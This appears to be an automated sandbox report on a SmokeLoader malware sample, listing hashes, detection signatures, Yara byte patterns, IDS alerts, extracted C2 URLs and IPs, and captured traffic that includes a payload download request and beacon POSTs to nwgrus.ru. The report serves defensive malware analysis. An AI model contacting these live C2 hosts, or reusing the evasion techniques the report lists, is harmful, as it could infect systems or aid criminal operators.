Edit tour

Windows Analysis Report
LgigaSKsL6.exe

Overview

General Information

Sample name:	LgigaSKsL6.exe renamed because original name is a hash value
Original sample name:	c61f76c54ce0f89894ef870a48c5497c.exe
Analysis ID:	1532278
MD5:	c61f76c54ce0f89894ef870a48c5497c
SHA1:	2a7dd87f781df6fdaa1b17695d93ee9accf36d1c
SHA256:	dc6c2f9d57aee159b5c6453b56c93fa6976f83a3685b388aff968e5dfe498841
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

LgigaSKsL6.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\LgigaSKsL6.exe" MD5: C61F76C54CE0F89894EF870A48C5497C)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

A869.exe (PID: 2028 cmdline: C:\Users\user\AppData\Local\Temp\A869.exe MD5: E3C51CB2EE848A9BED855AB3E756CD82)

vsvrjra (PID: 6248 cmdline: C:\Users\user\AppData\Roaming\vsvrjra MD5: C61F76C54CE0F89894EF870A48C5497C)

ajvrjra (PID: 2080 cmdline: C:\Users\user\AppData\Roaming\ajvrjra MD5: E3C51CB2EE848A9BED855AB3E756CD82)

vsvrjra (PID: 5340 cmdline: C:\Users\user\AppData\Roaming\vsvrjra MD5: C61F76C54CE0F89894EF870A48C5497C)

ajvrjra (PID: 3588 cmdline: C:\Users\user\AppData\Roaming\ajvrjra MD5: E3C51CB2EE848A9BED855AB3E756CD82)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3655:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3415:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3828:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3610:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vsvrjra, CommandLine: C:\Users\user\AppData\Roaming\vsvrjra, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vsvrjra, NewProcessName: C:\Users\user\AppData\Roaming\vsvrjra, OriginalFileName: C:\Users\user\AppData\Roaming\vsvrjra, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\vsvrjra, ProcessId: 6248, ProcessName: vsvrjra

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T23:27:36.506031+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	190.224.203.37	80	TCP
2024-10-12T23:27:37.897672+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	190.224.203.37	80	TCP
2024-10-12T23:27:39.375920+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	190.224.203.37	80	TCP
2024-10-12T23:27:40.762602+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	190.224.203.37	80	TCP
2024-10-12T23:27:42.132225+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	190.224.203.37	80	TCP
2024-10-12T23:27:43.504764+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	190.224.203.37	80	TCP
2024-10-12T23:27:44.877319+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	190.224.203.37	80	TCP
2024-10-12T23:27:46.243719+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	190.224.203.37	80	TCP
2024-10-12T23:27:47.659001+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	190.224.203.37	80	TCP
2024-10-12T23:27:49.040046+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	190.224.203.37	80	TCP
2024-10-12T23:27:50.403081+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	190.224.203.37	80	TCP
2024-10-12T23:27:51.781560+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	190.224.203.37	80	TCP
2024-10-12T23:27:53.491806+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	190.224.203.37	80	TCP
2024-10-12T23:27:54.872226+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	190.224.203.37	80	TCP
2024-10-12T23:27:56.260005+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	190.224.203.37	80	TCP
2024-10-12T23:27:57.931307+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	190.224.203.37	80	TCP
2024-10-12T23:27:59.334639+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	190.224.203.37	80	TCP
2024-10-12T23:28:00.783631+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	190.224.203.37	80	TCP
2024-10-12T23:28:02.177397+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	190.224.203.37	80	TCP
2024-10-12T23:28:03.568585+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49772	190.224.203.37	80	TCP
2024-10-12T23:28:04.965664+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49778	190.224.203.37	80	TCP
2024-10-12T23:28:06.355448+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49789	190.224.203.37	80	TCP
2024-10-12T23:28:07.767337+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49800	190.224.203.37	80	TCP
2024-10-12T23:28:09.198762+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49811	190.224.203.37	80	TCP
2024-10-12T23:28:12.186615+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49828	190.224.203.37	80	TCP
2024-10-12T23:28:13.598657+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49839	190.224.203.37	80	TCP
2024-10-12T23:28:14.981042+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49848	190.224.203.37	80	TCP
2024-10-12T23:28:16.368431+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49856	190.224.203.37	80	TCP
2024-10-12T23:28:17.790439+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49862	190.224.203.37	80	TCP
2024-10-12T23:28:19.160968+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49873	190.224.203.37	80	TCP
2024-10-12T23:28:20.515030+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49882	190.224.203.37	80	TCP
2024-10-12T23:28:21.888189+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49890	190.224.203.37	80	TCP
2024-10-12T23:28:23.273942+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49901	190.224.203.37	80	TCP
2024-10-12T23:28:24.646829+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49908	190.224.203.37	80	TCP
2024-10-12T23:28:26.025285+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49918	190.224.203.37	80	TCP
2024-10-12T23:28:27.541883+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49929	190.224.203.37	80	TCP
2024-10-12T23:29:37.673928+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50039	190.224.203.37	80	TCP
2024-10-12T23:29:45.033278+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50040	190.224.203.37	80	TCP
2024-10-12T23:29:53.061102+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50041	190.224.203.37	80	TCP
2024-10-12T23:30:03.157572+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50042	190.224.203.37	80	TCP
2024-10-12T23:30:20.229015+0200	2039103	1	A Network Trojan was detected	192.168.2.4	57093	190.220.21.28	80	TCP
2024-10-12T23:30:33.637008+0200	2039103	1	A Network Trojan was detected	192.168.2.4	57094	190.220.21.28	80	TCP
2024-10-12T23:30:46.932059+0200	2039103	1	A Network Trojan was detected	192.168.2.4	57095	190.220.21.28	80	TCP
2024-10-12T23:31:01.016369+0200	2039103	1	A Network Trojan was detected	192.168.2.4	57096	190.220.21.28	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\vsvrjra

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: LgigaSKsL6.exe	ReversingLabs: Detection: 42%
Source: LgigaSKsL6.exe	Virustotal: Detection: 40%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\vsvrjra	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A869.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ajvrjra	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LgigaSKsL6.exe

Joe Sandbox ML: detected

Source: LgigaSKsL6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\LgigaSKsL6.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49817 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49811 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49862 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49882 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49908 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49856 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49929 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49873 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49918 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49800 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49901 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49839 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49828 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57095 -> 190.220.21.28:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57094 -> 190.220.21.28:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57093 -> 190.220.21.28:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49848 -> 190.224.203.37:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57096 -> 190.220.21.28:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.220.21.28 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://ninjahallnews.com/search.php
Source: Malware configuration extractor	URLs: https://fallhandbat.com/search.php

Source: Joe Sandbox View	IP Address: 190.224.203.37 190.224.203.37
Source: Joe Sandbox View	IP Address: 23.145.40.164 23.145.40.164
Source: Joe Sandbox View	IP Address: 190.220.21.28 190.220.21.28

Source: Joe Sandbox View	ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: AMXArgentinaSAAR AMXArgentinaSAAR

Source: Joe Sandbox View

JA3 fingerprint: 72a589da586844d7f0818ce684948eea

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ddmlqgiwokgjnrjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://akwopxbyfda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hdugujrhcjt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yqqseuuafdwk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pkgsugfsxnjdsjfs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rwtmirjlqyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qgmuajpjvyrttvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pxoxujlnkixexhr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kklpocdpdsv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mubqagferfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://imnnydowlgvnht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jodccroecnfoy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: nwgrus.ru
